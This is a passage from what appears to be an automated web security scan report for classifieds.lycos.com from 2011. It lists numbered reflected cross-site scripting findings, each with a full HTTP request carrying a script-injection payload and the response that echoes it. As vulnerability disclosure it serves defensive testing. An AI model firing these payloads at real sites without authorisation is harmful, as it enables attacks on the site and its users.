P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-education-tutor/?31fb3"><script>alert(1)</script>50ca0473215=1&mobile=1" rel="nofollow">
...[SNIP]...

1.188. http://classifieds.lycos.com/service-entertainment-catering/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-entertainment-catering/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e23a3"><script>alert(1)</script>da19991cd03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-entertainment-cateringe23a3"><script>alert(1)</script>da19991cd03/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-entertainment-cateringe23a3"><script>alert(1)</script>da19991cd03/?mobile=1" rel="nofollow">
...[SNIP]...

1.189. http://classifieds.lycos.com/service-entertainment-catering/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-entertainment-catering/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29655"><script>alert(1)</script>fa8ef175739 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-entertainment-catering/?29655"><script>alert(1)</script>fa8ef175739=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-entertainment-catering/?29655"><script>alert(1)</script>fa8ef175739=1&mobile=1" rel="nofollow">
...[SNIP]...

1.190. http://classifieds.lycos.com/service-health/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-health/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 849a4"><script>alert(1)</script>c69ed26e79e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-health849a4"><script>alert(1)</script>c69ed26e79e/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-health849a4"><script>alert(1)</script>c69ed26e79e/?mobile=1" rel="nofollow">
...[SNIP]...

1.191. http://classifieds.lycos.com/service-health/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69242"><script>alert(1)</script>2ee2fffe34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-health/?69242"><script>alert(1)</script>2ee2fffe34=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-health/?69242"><script>alert(1)</script>2ee2fffe34=1&mobile=1" rel="nofollow">
...[SNIP]...

1.192. http://classifieds.lycos.com/service-home-appliance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-appliance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a035"><script>alert(1)</script>04bdf3b806 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-appliance3a035"><script>alert(1)</script>04bdf3b806/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-appliance3a035"><script>alert(1)</script>04bdf3b806/?mobile=1" rel="nofollow">
...[SNIP]...

1.193. http://classifieds.lycos.com/service-home-appliance/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-appliance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7003d"><script>alert(1)</script>d18f4482797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-appliance/?7003d"><script>alert(1)</script>d18f4482797=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:29 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-appliance/?7003d"><script>alert(1)</script>d18f4482797=1&mobile=1" rel="nofollow">
...[SNIP]...

1.194. http://classifieds.lycos.com/service-home-plumbing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-plumbing/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d827"><script>alert(1)</script>3238fd8a0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-plumbing4d827"><script>alert(1)</script>3238fd8a0cb/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:46 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-plumbing4d827"><script>alert(1)</script>3238fd8a0cb/?mobile=1" rel="nofollow">
...[SNIP]...

1.195. http://classifieds.lycos.com/service-home-plumbing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-plumbing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88064"><script>alert(1)</script>504679c49e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-plumbing/?88064"><script>alert(1)</script>504679c49e6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-plumbing/?88064"><script>alert(1)</script>504679c49e6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.196. http://classifieds.lycos.com/service-lawn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-lawn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b410"><script>alert(1)</script>a4e52787ed3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-lawn8b410"><script>alert(1)</script>a4e52787ed3/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:18:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-lawn8b410"><script>alert(1)</script>a4e52787ed3/?mobile=1" rel="nofollow">
...[SNIP]...

1.197. http://classifieds.lycos.com/service-lawn/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-lawn/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77998"><script>alert(1)</script>8ee624a3fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-lawn/?77998"><script>alert(1)</script>8ee624a3fb9=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:17:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-lawn/?77998"><script>alert(1)</script>8ee624a3fb9=1&mobile=1" rel="nofollow">
...[SNIP]...

1.198. http://classifieds.lycos.com/service-move/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-move/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d23"><script>alert(1)</script>67fb0a91376 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-move57d23"><script>alert(1)</script>67fb0a91376/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:18:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-move57d23"><script>alert(1)</script>67fb0a91376/?mobile=1" rel="nofollow">
...[SNIP]...

1.199. http://classifieds.lycos.com/service-move/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-move/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638e"><script>alert(1)</script>32bb36ba6df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-move/?c638e"><script>alert(1)</script>32bb36ba6df=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-move/?c638e"><script>alert(1)</script>32bb36ba6df=1&mobile=1" rel="nofollow">
...[SNIP]...

1.200. http://classifieds.lycos.com/service-pet-grooming/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-grooming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5587"><script>alert(1)</script>05047fa2e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-groomingb5587"><script>alert(1)</script>05047fa2e57/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:13:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-groomingb5587"><script>alert(1)</script>05047fa2e57/?mobile=1" rel="nofollow">
...[SNIP]...

1.201. http://classifieds.lycos.com/service-pet-grooming/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-grooming/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60266"><script>alert(1)</script>3c094c78936 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-grooming/?60266"><script>alert(1)</script>3c094c78936=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-grooming/?60266"><script>alert(1)</script>3c094c78936=1&mobile=1" rel="nofollow">
...[SNIP]...

1.202. http://classifieds.lycos.com/service-pet-sitter/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-sitter/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9635"><script>alert(1)</script>e217af7b012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-sitterd9635"><script>alert(1)</script>e217af7b012/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-sitterd9635"><script>alert(1)</script>e217af7b012/?mobile=1" rel="nofollow">
...[SNIP]...

1.203. http://classifieds.lycos.com/service-pet-sitter/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-sitter/

Issue detail

